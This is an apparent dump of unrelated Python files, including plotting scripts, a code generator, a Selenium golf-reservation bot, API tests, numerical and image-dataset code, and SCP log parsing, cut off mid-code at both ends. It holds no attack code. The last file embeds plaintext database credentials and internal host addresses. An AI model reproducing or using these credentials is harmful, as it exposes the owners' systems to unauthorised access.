json.load(f2)\nwith open(filename3) as f3:\n data3 = json.load(f3)\nwith open(filename4) as f4:\n data4 = json.load(f4)\nwith open(filename5) as f5:\n data5 = json.load(f5)\n\ndef getData(data):\n meanv= np.array(data['mean'])\n minerr = meanv-np.array(data['min'])\n maxerr = np.array(data['max'])-meanv\n return (meanv, minerr, maxerr)\n\ndef plotData(data, marker, color, ax):\n l = ax.errorbar(data1['nof_blocks'], data[0], yerr=[data[1], data[2]], fmt=color+marker+'--',linewidth=1,elinewidth=1,ecolor=color, capsize=5, capthick=0.5)\n ax.set_xticks(range(1,33,2))\n ax.grid(True, which=\"both\")\n ax.set_xlabel('Nof Blocks')\n ax.set_ylabel('Cycles/Elem')\n 
return l\n\nfig, ax = plt.subplots(3,2)\nl1 = plotData(getData(data1),'*','r',ax[0,0])\nl2 = plotData(getData(data2),'+','m',ax[1,0])\nl3 = plotData(getData(data3),'x','k',ax[1,1])\nl4 = plotData(getData(data4),'|','b',ax[2,0])\nl5 = plotData(getData(data5),'v','g',ax[2,1])\nax[0, 1].axis('off')\n\n#fig.legend((l1, l2, l3, l4, l5), (\\\n# '128kB, 32 threads',\\\n# '128kB, 128 threadst',\\\n# '128kB, 256 threadst',\\\n# '128kB, 512 threads',\\\n# '128kB, 1024 threads'\\\n# ), 'best')\n\nbox = ax[0,1].get_position()\n#ax[0,0].set_position([box.x0, box.y0, box.width * 0.8, box.height])\nax[0,1].legend((l1, l2, l3 ,l4, l5), (\\\n '128kB, 32 threads',\\\n '128kB, 128 threadst',\\\n '128kB, 256 threadst',\\\n '128kB, 512 threads',\\\n '128kB, 1024 threads'\\\n ),loc='center')\nfig.suptitle('Coallocent sequential walk - multiple blocks')\nplt.xlabel('Nof Blocks')\nplt.ylabel('Cycles/Elem')\nplt.show()\n","sub_path":"experiments/cpu-inter-sequential-walk-multiblock/plotwup.py","file_name":"plotwup.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"336796228","text":"# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE\n\nfrom __future__ import absolute_import\n\nimport os\nimport datetime\nimport time\n\nimport yaml\n\nCURRENT_DIR = os.path.dirname(os.path.realpath(__file__))\n\n\ndef reproducible_datetime():\n\n build_date = datetime.datetime.utcfromtimestamp(\n int(os.environ.get(\"SOURCE_DATE_EPOCH\", time.time()))\n )\n return build_date.isoformat().replace(\"T\", \" AT \")[:22]\n\n\ndef type_to_ctype(typename):\n is_const = False\n if \"Const[\" in typename:\n is_const = True\n typename = typename[len(\"Const[\") : -1]\n count = 0\n while \"List[\" in typename:\n count += 1\n typename = typename[len(\"List[\") : -1]\n typename = typename + \"*\" * count\n if is_const:\n typename = \"const \" + typename\n return typename\n\n\ndef 
include_kernels_h(specification):\n print(\"Generating include/awkward/kernels.h...\")\n\n with open(\n os.path.join(CURRENT_DIR, \"..\", \"include\", \"awkward\", \"kernels.h\"), \"w\"\n ) as header:\n header.write(\n \"\"\"// AUTO GENERATED ON {0}\n// DO NOT EDIT BY HAND!\n//\n// To regenerate file, run\n//\n// python dev/generate-kernel-signatures.py\n//\n// (It is usually run as part of pip install . or localbuild.py.)\n\n#ifndef AWKWARD_KERNELS_H_\n#define AWKWARD_KERNELS_H_\n\n#include \"awkward/common.h\"\n\nextern \"C\" {{\n\n\"\"\".format(\n reproducible_datetime()\n )\n )\n for spec in specification[\"kernels\"]:\n for childfunc in spec[\"specializations\"]:\n header.write(\" \" * 2 + \"EXPORT_SYMBOL ERROR\\n\")\n header.write(\" \" * 2 + childfunc[\"name\"] + \"(\\n\")\n for i, arg in enumerate(childfunc[\"args\"]):\n header.write(\n \" \" * 4 + type_to_ctype(arg[\"type\"]) + \" \" + arg[\"name\"]\n )\n if i == (len(childfunc[\"args\"]) - 1):\n header.write(\");\\n\")\n else:\n header.write(\",\\n\")\n header.write(\"\\n\")\n header.write(\n \"\"\"}\n\n#endif // AWKWARD_KERNELS_H_\n\"\"\"\n )\n\n print(\"Done with include/awkward/kernels.h.\")\n\n\ntype_to_dtype = {\n \"bool\": \"bool_\",\n \"int8\": \"int8\",\n \"uint8\": \"uint8\",\n \"int16\": \"int16\",\n \"uint16\": \"uint16\",\n \"int32\": \"int32\",\n \"uint32\": \"uint32\",\n \"int64\": \"int64\",\n \"uint64\": \"uint64\",\n \"float\": \"float32\",\n \"double\": \"float64\",\n}\n\n\ndef type_to_pytype(typename, special):\n if \"Const[\" in typename:\n typename = typename[len(\"Const[\") : -1]\n count = 0\n while \"List[\" in typename:\n count += 1\n typename = typename[len(\"List[\") : -1]\n if typename.endswith(\"_t\"):\n typename = typename[:-2]\n if count != 0:\n special.append(type_to_dtype[typename])\n return (\"POINTER(\" * count) + (\"c_\" + typename) + (\")\" * count)\n\n\ndef kernel_signatures_py(specification):\n print(\"Generating src/awkward/_kernel_signatures.py...\")\n\n with 
open(\n os.path.join(CURRENT_DIR, \"..\", \"src\", \"awkward\", \"_kernel_signatures.py\"),\n \"w\",\n ) as file:\n file.write(\n \"\"\"# AUTO GENERATED ON {0}\n# DO NOT EDIT BY HAND!\n#\n# To regenerate file, run\n#\n# python dev/generate-kernel-signatures.py\n#\n# (It is usually run as part of pip install . or localbuild.py.)\n\n# fmt: off\n\nfrom ctypes import (\n POINTER,\n Structure,\n c_bool,\n c_int8,\n c_uint8,\n c_int16,\n c_uint16,\n c_int32,\n c_uint32,\n c_int64,\n c_uint64,\n c_float,\n c_double,\n c_char_p,\n)\n\nimport numpy as np\n\nfrom numpy import (\n bool_,\n int8,\n uint8,\n int16,\n uint16,\n int32,\n uint32,\n int64,\n uint64,\n float32,\n float64,\n)\n\nclass ERROR(Structure):\n _fields_ = [\n (\"str\", c_char_p),\n (\"filename\", c_char_p),\n (\"id\", c_int64),\n (\"attempt\", c_int64),\n (\"pass_through\", c_bool),\n ]\n\n\ndef by_signature(lib):\n out = {{}}\n\"\"\".format(\n reproducible_datetime()\n )\n )\n\n for spec in specification[\"kernels\"]:\n for childfunc in spec[\"specializations\"]:\n special = [repr(spec[\"name\"])]\n arglist = [\n type_to_pytype(x[\"type\"], special) for x in childfunc[\"args\"]\n ]\n file.write(\n \"\"\"\n f = lib.{0}\n f.argtypes = [{1}]\n f.restype = ERROR\n out[{2}] = f\n\"\"\".format(\n childfunc[\"name\"], \", \".join(arglist), \", \".join(special)\n )\n )\n\n file.write(\n \"\"\"\n return out\n\"\"\"\n )\n\n print(\"Done with src/awkward/_kernel_signatures.py...\")\n\n\nif __name__ == \"__main__\":\n with open(os.path.join(CURRENT_DIR, \"..\", \"kernel-specification.yml\")) as specfile:\n specification = yaml.safe_load(specfile)\n include_kernels_h(specification)\n kernel_signatures_py(specification)\n","sub_path":"dev/generate-kernel-signatures.py","file_name":"generate-kernel-signatures.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"597280122","text":"import time\nimport os\n\nfrom selenium import 
webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom time import sleep\n\n############### 예약 제외일자 설정하기 ##################################################\n# (week, 요일) 1=일, 2=월, 3=화, 4=수, 5=목, 6=금, 7=토) \n# 2번째주 수요일을 제외할 경우: except_date = [(2, 4)]\n# 2번째주 수요일과 3번째주 토요일을 제외할 경우: except_date = [(2, 4), (3, 7)]\n\nexcept_date = [] \n#######################################################################################\n\nopen_flag = False\ndef ecolian_action():\n global open_flag\n\n options = webdriver.ChromeOptions()\n options.add_argument('window-size=240,200')\n \n driver = webdriver.Chrome(executable_path='chromedriver_linux64/chromedriver', options=options)\n driver.implicitly_wait(2)\n\n driver.get(url='https://jc.ecolian.or.kr/asp/ecolian/login.asp')\n\n id_input = driver.find_element_by_id('txtId')\n id_input. send_keys('maranta')\n\n pass_input = driver.find_element_by_id('txtPwd')\n pass_input.send_keys('xxxxx')\n\n login_button = driver.find_element_by_id('btnLogin')\n login_button.send_keys(Keys.RETURN)\n \n sleep(1)\n\n reserve_link = driver.find_element_by_xpath('//*[@id=\"navi\"]/li[4]/a/img')\n reserve_link.click()\n\n next_monath_link = driver.find_element_by_xpath('//*[@id=\"contents\"]/p/a[2]/img')\n next_monath_link.click()\n\n for i in range(2, 8):\n except_cnt = 0\n for j in range(1, 8):\n date_xpath = '//*[@id=\"contents\"]/table/tbody/tr[' + str(i) + ']/td[' + str(j) + ']/p'\n try:\n date_link = driver.find_element_by_xpath(date_xpath)\n print(i, j, date_link.text)\n if(date_link.text == '[예약가능]' and (i-1, j) not in except_date):\n date_link.click()\n comfirm_link = driver.find_element_by_xpath('//*[@id=\"rspop_01\"]/div[1]/div[3]/div/a[1]')\n comfirm_link.click()\n time_link = driver.find_element_by_xpath('//*[@id=\"contents\"]/table/tbody/tr[2]/td[2]/span')\n time_link.click()\n alert_box = driver.switch_to_alert()\n alert_box.accept()\n \n duration = 1 # seconds\n freq = 440 # Hz\n os.system('play -nq -t alsa synth {} sine 
{}'.format(duration, freq))\n open_flag = True\n except:\n except_cnt += 1\n print(i, j, 'No Schedule')\n # except가 7번 발생하면 예약화면이 아니므로(로그인 실패 등) 종료\n if(except_cnt >= 7):\n break\n if(not open_flag):\n driver.close() \n\ni = 0\nstarttime = time.time()\nwhile True:\n i += 1\n if(not open_flag):\n print(\"close\", i, open_flag)\n ecolian_action()\n else:\n print(\"open\", i, open_flag)\n\n time.sleep(5 - ((time.time() - starttime) % 5))\n","sub_path":"ecolian_reservation_jechon_next_month.py","file_name":"ecolian_reservation_jechon_next_month.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"409483230","text":"from Game import Unit\r\nfrom Game import Player\r\nfrom Interfacer.Texty import Texty\r\nfrom Game import BattleHandler\r\nfrom Interfacer.Savvy import Savvy\r\nfrom Game.CommandFactory import CommandFactory\r\n\r\n\r\n \r\n \r\ndef analysisPhase(player):\r\n texty = Texty() \r\n while (True):\r\n enemy = Unit.Unit(\"Enemy\", 0) \r\n player.analyze()\r\n enemy.analyze() \r\n texty.showPlayer(\"Do you wish to fight this enemy?\")\r\n read = texty.readOneKeyFromPlayer() \r\n read = read.lower()\r\n if (read == \"y\"): \r\n texty.showPlayer(\"You approach the enemy and fight!\")\r\n return enemy \r\n else: \r\n texty.showPlayer(\"You bravely flee from your foe!\")\r\n \r\n \r\n \r\n \r\n#MAIN\r\n\r\ntexty = Texty()\r\ntexty.setUp(\"network\")\r\ntexty.getPlayerConnection()\r\ntexty.showPlayer(\"Hello, and welcome to the Enrichment Center. 
The Device Has Been Modified.\")\r\nplayGame = True\r\ngameOverFlag = False\r\ncf = CommandFactory()\r\nsavvy = Savvy()\r\nflagLoadedMidfight = False\r\nif (savvy.isMidFight()):\r\n texty.showPlayer(\"Do you want to resume the fight?\")\r\n read = texty.readOneKeyFromPlayer()\r\n if (read == \"y\"):\r\n cf.load()\r\n \r\n flagLoadedMidfight = True\r\nif (not flagLoadedMidfight):\r\n texty.showPlayer(\"Do you want to load a game?\")\r\n read = texty.readOneKeyFromPlayer()\r\n if (read == \"y\"):\r\n texty.showPlayer (\"Please write the name of the player\")\r\n read = texty.readOneKeyFromPlayer()\r\n playerchar = savvy.loadPickle(read) \r\n else : playerchar = cf.create(\"newPlayer\", [\"Player\", \"Warrior\"])\r\n \r\nplayerchar = cf.getNextCommand().execute()\r\n\r\n \r\nwhile (playGame):\r\n \r\n if (cf.needsInput()):\r\n enemy = analysisPhase(playerchar) \r\n combat = cf.create(\"fight\", [playerchar, enemy])\r\n wonCombat, playerchar = cf.getNextCommand().execute()\r\n if (not wonCombat): \r\n texty.showPlayer(\"You lose! Play again?\")\r\n playerchar = Player.Player(\"Player\", \"test\")\r\n else:\r\n texty.showPlayer(\"You win! 
Save and quit?\")\r\n read = texty.readOneKeyFromConsole()\r\n if (read == \"y\"):\r\n texty.showPlayer(\"(J)son or (P)ickle?\")\r\n read = texty.readOneKeyFromPlayer() \r\n if (read == \"j\"):\r\n savvy.saveJson(playerchar)\r\n texty.showPlayer(\"Saved.\")\r\n elif (read == \"p\"):\r\n savvy.savePickle(playerchar)\r\n texty.showPlayer(\"Saved.\")\r\n else:\r\n texty.showPlayer(\"Not a valid option, defaulting to pickle\") \r\n savvy.savePickle(playerchar)\r\n texty.showPlayer(\"Saved.\")","sub_path":"Test/Game/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"43392200","text":"import unittest\nimport sys\nfrom sqlalchemy import false\n\n# pip3 install google-api-python-client-py3\n\n\nfrom unittest import TestCase\n\nclass test_google_photo(TestCase):\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n\n def test_getPeoples(self):\n from os.path import join, dirname\n\n from googleapiclient.discovery import build\n from httplib2 import Http\n from oauth2client import file, client, tools\n SCOPES = 'https://www.googleapis.com/auth/photoslibrary.readonly'\n\n store = file.Storage(join(dirname(__file__), 'token-for-google.json'))\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets(join(dirname(__file__), 'client_id.json', SCOPES))\n creds = tools.run_flow(flow, store)\n google_photos = build('photoslibrary', 'v1', http=creds.authorize(Http()))\n\n day, month, year = ('0', '6', '2019') # Day or month may be 0 => full month resp. 
year\n date_filter = [{\"day\": day, \"month\": month, \"year\": year}] # No leading zeroes for day an month!\n nextpagetoken = 'Dummy'\n while nextpagetoken != '':\n nextpagetoken = '' if nextpagetoken == 'Dummy' else nextpagetoken\n results = google_photos.mediaItems().search(\n body={\"filters\": {\"dateFilter\": {\"dates\": [{\"day\": day, \"month\": month, \"year\": year}]}},\n \"pageSize\": 10, \"pageToken\": nextpagetoken}).execute()\n # The default number of media items to return at a time is 25. The maximum pageSize is 100.\n items = results.get('mediaItems', [])\n nextpagetoken = results.get('nextPageToken', '')\n for item in items:\n print(f\"{item['filename']} {item['mimeType']} '{item.get('description', '- -')}'\"\n f\" {item['mediaMetadata']['creationTime']}\\nURL: {item['productUrl']}\")\n\n\n\n def test_list_albums(self):\n #from __future__ import print_function\n from apiclient.discovery import build\n from httplib2 import Http\n from oauth2client import file, client, tools\n\n # Setup the Photo v1 API\n SCOPES = 'https://www.googleapis.com/auth/photoslibrary.readonly'\n\n # see https://console.cloud.google.com/apis/credentials?pli=1 to generate credentials.json file\n store = file.Storage('credentials.json')\n print(store)\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets('credentials.json', SCOPES)\n # flow = client.flow_from_clientsecrets('client_secret.json', SCOPES)\n creds = tools.run_flow(flow, store)\n service = build('photoslibrary', 'v1', http=creds.authorize(Http()))\n\n # Call the Photo v1 API\n results = service.albums().list(\n pageSize=10, fields=\"nextPageToken,albums(id,title)\").execute()\n items = results.get('albums', [])\n if not items:\n print('No albums found.')\n else:\n print('Albums:')\n for item in items:\n print('{0} ({1})'.format(item['title'].encode('utf8'), 
item['id']))","sub_path":"tests/test_google_api/test_google_photo.py","file_name":"test_google_photo.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"109758512","text":"# Testing TSAdjoint and matrix-free Jacobian\n\nimport sys, petsc4py\npetsc4py.init(sys.argv)\n\nfrom petsc4py import PETSc\n\nclass VDP(object):\n n = 2\n comm = PETSc.COMM_SELF\n def __init__(self, mu_=1.0e3,mf_=False):\n self.mu_ = mu_\n self.mf_ = mf_\n if self.mf_:\n self.J_ = PETSc.Mat().createDense([self.n,self.n], comm=self.comm)\n self.J_.setUp()\n self.Jp_ = PETSc.Mat().createDense([self.n,1], comm=self.comm)\n self.Jp_.setUp()\n def initialCondition(self, u):\n mu = self.mu_\n u[0] = 2.0\n u[1] = -2.0/3.0 + 10.0/(81.0*mu) - 292.0/(2187.0*mu*mu)\n u.assemble()\n def evalFunction(self, ts, t, u, f):\n mu = self.mu_\n f[0] = u[1]\n f[1] = mu*((1.-u[0]*u[0])*u[1]-u[0])\n f.assemble()\n def evalJacobian(self, ts, t, u, A, B):\n if not self.mf_:\n J = A\n else :\n J = self.J_\n mu = self.mu_\n J[0,0] = 0\n J[1,0] = -mu*(2.0*u[1]*u[0]+1.)\n J[0,1] = 1.0\n J[1,1] = mu*(1.0-u[0]*u[0])\n J.assemble()\n if A != B: B.assemble()\n return True # same nonzero pattern\n def evalJacobianP(self, ts, t, u, C):\n if not self.mf_:\n Jp = C\n else:\n Jp = self.Jp_\n Jp[0,0] = 0\n Jp[1,0] = (1.-u[0]*u[0])*u[1]-u[0]\n Jp.assemble()\n return True\n def evalIFunction(self, ts, t, u, udot, f):\n mu = self.mu_\n f[0] = udot[0]-u[1]\n f[1] = udot[1]-mu*((1.-u[0]*u[0])*u[1]-u[0])\n f.assemble()\n def evalIJacobian(self, ts, t, u, udot, shift, A, B):\n if not self.mf_:\n J = A\n else :\n J = self.J_\n mu = self.mu_\n J[0,0] = shift\n J[1,0] = mu*(2.0*u[1]*u[0]+1.)\n J[0,1] = -1.0\n J[1,1] = shift-mu*(1.0-u[0]*u[0])\n J.assemble()\n if A != B: B.assemble()\n return True # same nonzero pattern\n def evalIJacobianP(self, ts, t, u, udot, shift, C):\n if not self.mf_:\n Jp = C\n else:\n Jp = self.Jp_\n Jp[0,0] = 0\n Jp[1,0] 
= u[0]-(1.-u[0]*u[0])*u[1]\n Jp.assemble()\n return True\n\nclass JacShell:\n def __init__(self, ode):\n self.ode_ = ode\n def mult(self, A, x, y):\n \"y <- A * x\"\n self.ode_.J_.mult(x,y)\n def multTranspose(self, A, x, y):\n \"y <- A' * x\"\n self.ode_.J_.multTranspose(x, y)\n\nclass JacPShell:\n def __init__(self, ode):\n self.ode_ = ode\n def multTranspose(self, A, x, y):\n \"y <- A' * x\"\n self.ode_.Jp_.multTranspose(x, y)\nOptDB = PETSc.Options()\n\nmu_ = OptDB.getScalar('mu', 1.0e3)\nmf_ = OptDB.getBool('mf', False)\n\nimplicitform_ = OptDB.getBool('implicitform', False)\n\node = VDP(mu_,mf_)\n\nif not mf_:\n J = PETSc.Mat().createDense([ode.n,ode.n], comm=ode.comm)\n J.setUp()\n Jp = PETSc.Mat().createDense([ode.n,1], comm=ode.comm)\n Jp.setUp()\nelse:\n J = PETSc.Mat().create()\n J.setSizes([ode.n,ode.n])\n J.setType('python')\n shell = JacShell(ode)\n J.setPythonContext(shell)\n J.setUp()\n J.assemble()\n Jp = PETSc.Mat().create()\n Jp.setSizes([ode.n,1])\n Jp.setType('python')\n shell = JacPShell(ode)\n Jp.setPythonContext(shell)\n Jp.setUp()\n Jp.assemble()\n\nu = PETSc.Vec().createSeq(ode.n, comm=ode.comm)\nf = u.duplicate()\nadj_u = []\nadj_u.append(PETSc.Vec().createSeq(ode.n, comm=ode.comm))\nadj_u.append(PETSc.Vec().createSeq(ode.n, comm=ode.comm))\nadj_p = []\nadj_p.append(PETSc.Vec().createSeq(1, comm=ode.comm))\nadj_p.append(PETSc.Vec().createSeq(1, comm=ode.comm))\n\nts = PETSc.TS().create(comm=ode.comm)\nts.setProblemType(ts.ProblemType.NONLINEAR)\n\nif implicitform_:\n ts.setType(ts.Type.CN)\n ts.setIFunction(ode.evalIFunction, f)\n ts.setIJacobian(ode.evalIJacobian, J)\n ts.setIJacobianP(ode.evalIJacobianP, Jp)\nelse:\n ts.setType(ts.Type.RK)\n ts.setRHSFunction(ode.evalFunction, f)\n ts.setRHSJacobian(ode.evalJacobian, J)\n ts.setRHSJacobianP(ode.evalJacobianP, 
Jp)\n\nts.setSaveTrajectory()\nts.setTime(0.0)\nts.setTimeStep(0.001)\nts.setMaxTime(0.5)\nts.setMaxSteps(1000)\nts.setExactFinalTime(PETSc.TS.ExactFinalTime.MATCHSTEP)\n\nts.setFromOptions()\node.initialCondition(u)\nts.solve(u)\n\nadj_u[0][0] = 1\nadj_u[0][1] = 0\nadj_u[0].assemble()\nadj_u[1][0] = 0\nadj_u[1][1] = 1\nadj_u[1].assemble()\nadj_p[0][0] = 0\nadj_p[0].assemble()\nadj_p[1][0] = 0\nadj_p[1].assemble()\n\nts.setCostGradients(adj_u,adj_p)\n\nts.adjointSolve()\n\nadj_u[0].view()\nadj_u[1].view()\nadj_p[0].view()\nadj_p[1].view()\n\ndef compute_derp(du,dp):\n print(du[1]*(-10.0/(81.0*mu_*mu_)+2.0*292.0/(2187.0*mu_*mu_*mu_))+dp[0])\n\ncompute_derp(adj_u[0],adj_p[0])\ncompute_derp(adj_u[1],adj_p[1])\n\ndel ode, J, Jp, u, f, ts, adj_u, adj_p\n","sub_path":"src/binding/petsc4py/demo/ode/vanderpol.py","file_name":"vanderpol.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"285341354","text":"#Mengurutkan data dari kecil kebesar\n\nprint(\"~\"*39)\n\numur_adik = input(\"Umur adik : \")\numur_kakak = input(\"Umur kakak : \")\numur_ayah = input(\"Umur ayah : \")\numur_ibu = input(\"Umur ibu : \")\n\ndata = [umur_adik, umur_kakak, umur_ayah, umur_ibu]\n\n#Fungsi .sort() untuk mengurutkan bilangan kecil ke besar\ndata.sort()\n\nprint(\"Maka urutan umur dari termuda hingga tertua adalah :\",data)","sub_path":"Mengurutkandata.py","file_name":"Mengurutkandata.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"246203105","text":"if __name__ == '__main__':\n import matplotlib\n # Agg backend runs without a display\n matplotlib.use('Agg')\n import matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport sys\nimport json\nimport datetime\nimport numpy as np\nimport skimage.io\nimport cv2\nfrom scipy.ndimage.measurements import label\nROOT_DIR = os.path.abspath(\"../\")\n# 
Import Mask RCNN\nsys.path.append(ROOT_DIR) # To find local version of the library\nfrom mrcnn.config import Config\nfrom mrcnn import utils\n\nclass CellDataset(utils.Dataset):\n\n def load_trainingcells(self, dataset_dir):\n \"\"\"\n dataset_dir: The directory of training images.\n \"\"\"\n # Add classes. We have one class.\n # Naming the dataset cell, and the class cell\n self.add_class(\"cell\", 1, \"cell\")\n image_ids = next(os.walk(dataset_dir))[2]\n #To suffle the images just to make sure that any bais due to\n #generation does not kick in.\n image_ids = list(set(image_ids))\n\n # Add images\n for image_id in image_ids:\n\n self.add_image(\n \"cell\",\n image_id=image_id,\n path=os.path.join(dataset_dir,image_id))\n\n def load_validationcells(self,dataset_dir):\n #dataset_dir: The directory of validation images.\n self.add_class(\"cell\",1,\"cell\")\n image_ids=next(os.walk(dataset_dir))[2]\n image_ids=list(set(image_ids))\n for image_id in image_ids:\n self.add_image(\"cell\",image_id=image_id,path=os.path.join(dataset_dir,image_id))\n\n def train_validate_split(self,dataset_dir,ratio=0.7):\n #If the validation set needs to be a part of the training data\n #We need to randomly select out of it ,by the ratio=training/validation\n image_ids=next(os.walk(dataset_dir))[2]\n splitratio=int((1-ratio)*len(image_ids))\n train_ids=np.random.choice(image_ids,splitratio)\n for i in range(len(train_ids)):\n train_ids[i]=str(os.path.join(dataset_dir,train_ids[i]))\n #returns the array of images to train\n return train_ids\n\n def train_validate_loadtrain(self,dataset_dir,train_ids):\n self.add_class(\"cell\", 1, \"cell\")\n for image_id in train_ids:\n self.add_image(\"cell\",image_id=image_id,path=image_id)\n\n def train_validate_loadval(self,dataset_dir,train_ids):\n self.add_class(\"cell\",1,\"cell\")\n image_ids=next(os.walk(dataset_dir))[2]\n val_ids=list(set(image_ids)-set(train_ids))\n for image_id in val_ids:\n 
self.add_image(\"cell\",image_id=image_id,path=image_id)\n\n def load_mask(self, image_id):\n \"\"\"Generate instance masks for an image.\n Returns:\n masks: A bool array of shape [height, width, instance count] with\n one mask per instance.\n class_ids: a 1D array of class IDs of the instance masks.\n \"\"\"\n info = self.image_info[image_id]\n image_name=info['path'].split(\"/\")[-1]\n # Get mask directory from image path\n #mask_dir = os.path.join(os.path.dirname(os.path.dirname(info['path'])), \"masks\")\n mask_dir = '/Mask_RCNN/data/annotated'\n\n #Get the exact full mask for that image\n for f in next(os.walk(mask_dir))[2]:\n if f.endswith(str(image_name)):\n full_mask = cv2.imread(os.path.join(mask_dir, f),0)\n\n #extract indivial masks of cells from the full mask\n lb = label(full_mask)\n\n msks = []\n for key in range(1,lb[1]+1):\n\n x = lb[1]+1\n #print(x)\n #print(key)\n\n\n newim=np.zeros(full_mask.shape)\n for i in range(full_mask.shape[0]):\n for j in range(full_mask.shape[1]):\n if lb[0][i][j]==key:\n newim[i][j]=1\n msks.append(newim)\n #msks=np.astype(np.bool)\n #print (msks)\n\n # Combine these masks of indiviual cells\n mask = np.stack(msks, axis=-1)\n # Return mask, and array of class IDs of each instance. 
Since we have\n # one class ID, we return an array of ones\n return mask, np.ones([mask.shape[-1]], dtype=np.int32)\n\n def image_reference(self, image_id):\n \"\"\"Return the path of the image.\"\"\"\n info = self.image_info[image_id]\n if info[\"source\"] == \"cell\":\n return info[\"id\"]\n else:\n super(self.__class__, self).image_reference(image_id)\n","sub_path":"mrcnn/deepcell_dataset.py","file_name":"deepcell_dataset.py","file_ext":"py","file_size_in_byte":4450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"340922901","text":"from gi import require_version\nrequire_version( \"Gtk\", \"3.0\" )\nfrom gi.repository import Gtk, Gdk, GdkPixbuf, GLib \n\nclass ColorDialog( Gtk.Dialog ):\n\n def __init__( self, parent ):\n Gtk.Dialog.__init__(self, \"Pick a Color\", parent, 0, \n (Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL, \n Gtk.STOCK_OK, Gtk.ResponseType.OK))\n self.set_default_size( 150, 100 )\n\n box = self.get_content_area()\n box.set_border_width( 10 )\n self.colorchooser = Gtk.ColorChooserWidget(show_editor=True)\n self.colorchooser.set_use_alpha( False )\n box.add( self.colorchooser )\n self.show_all()\n","sub_path":"src/gui/colorpicker.py","file_name":"colorpicker.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"503805140","text":"'''\n'''\n\nfrom __future__ import division\nimport pypyodbc as odb\nimport pandas.io.sql as psql\nimport re, sys, os, time\nimport numpy as np\nimport pandas as pd\nimport sklearn as sk\nfrom datetime import datetime\nfrom datetime import timedelta\nimport json\nfrom sqlalchemy import create_engine\n\n\nengine = create_engine(\"mssql+pypyodbc://odin:odin168!@10.132.44.78:3000/ODIN?driver=SQL Server\")\npg_engine = create_engine('postgresql://postgres:1Bxpia2a456789@localhost:5432/scm')\n\n\ndef read_scp_folder_today(path, date_delta):\n\tfile_list = 
list(os.listdir(path))\n\t#for i in range(len(file_list)):\n\t#\tfile_list[i]= file_list[i]\n\tfile_list_2= list(range(len(file_list)))\n\tfor i in range(1,len(file_list)):\n\t\tfile_list_2[i]= [path+file_list[i], file_list[i].replace('.','-').split('-')[1], file_list[i].replace('.','-').split('-')[2][:6], file_list[i].replace('.','-').split('-')[2][:10]]\n\tdf_files = pd.DataFrame( file_list_2[1:], columns = ['path', 'site', 'update_time', 'time_stamp'])\n\ttime_ref = str(datetime.today().date()-timedelta(date_delta))[2:].replace('-','')\n\tdf_files_2 = df_files.sort_values('update_time',ascending=False)\n\tdf_files_2 = df_files_2[ df_files_2['update_time']==time_ref ]\n\tdf_files_2.index = range(1,len(df_files_2)+1)\n\treturn df_files_2\n\n\ndef read_scp_document_v2(obj1):\n\t'''\n\tinput data : obj1 = path(str) target to file level\n\toutput data : json-like list \n\t'''\n\twith open (obj1,\"r\") as myfile:data=myfile.read().replace('\\n', '').replace('REC|','#wa-REC|')\n\tdata = [ s for s in [ s.split('|') for s in data.split('#wa-') ] ]\n\t#data[0] = data[0][1:]\n\treturn data\n\n\n# Check the data structure\ndef check_size_distribution(obj):\n\t'''\n\tcheck the data length => show df\n\tin-put : scp FB01 (json-like list) ex : read_scp_document_v2(path)\n\tout-put : df with distribution\n\t'''\t\n\ttemp = []\n\tfor i in range(len(obj)):temp += [ len(obj[i]) ] # count the size of each sub-list\n\ttemp = pd.DataFrame({'count':temp}) # json-like to table\n\ttemp = pd.DataFrame({'index':list(temp['count'].value_counts().index),'count':list(temp['count'].value_counts())})\n\treturn temp\n\ndef check_dq(obj):\t\n\t'''\n\tcheck the data length => lf there are some length is not majority => show data\n\tin-put : scp FB01 (json-like list) ex : read_scp_document_v2(path)\n\tout-put : json-like list with singular points\n\t'''\t\n\ttemp = []\n\tfor i in range(len(obj)):temp += [ len(obj[i]) ] # count the size of each sub-list\n\ttemp = pd.DataFrame({'count':temp}) # 
json-like to table\n\ttemp = pd.DataFrame({'index':list(temp['count'].value_counts().index),'count':list(temp['count'].value_counts())})\n\tsingular=[]\n\tfor i in range(len(temp)): \n\t\tif temp['count'][i] / sum(temp['count']) < 0.05: \n\t\t\tsingular += [ temp['index'][i] ]\n\ttemp = []\n\tfor i in range(len(obj)):\n\t\tfor j in range(len(singular)):\n\t\t\tif len(obj[i])== singular[j]:temp+=[ obj[i] ]\n\treturn temp\n\n\ndef trans_to_table(obj):\n\t'''\n\tGoal : transform from json-like list to read_scp_document_v2(path)\n\tin-put : scp FB01 (json-like list) ex : read_scp_document_v2(path)\n\t-> create table columns with the max_len of list\n\t-> exame the data length and make it the same length to have same table columns\n\t-> use df.loc[i] to add each list into a row\n\t'''\n\tmax_len = check_size_distribution(obj)['index'].max()\n\tmain_column = list(range(max_len))\n\tdf = 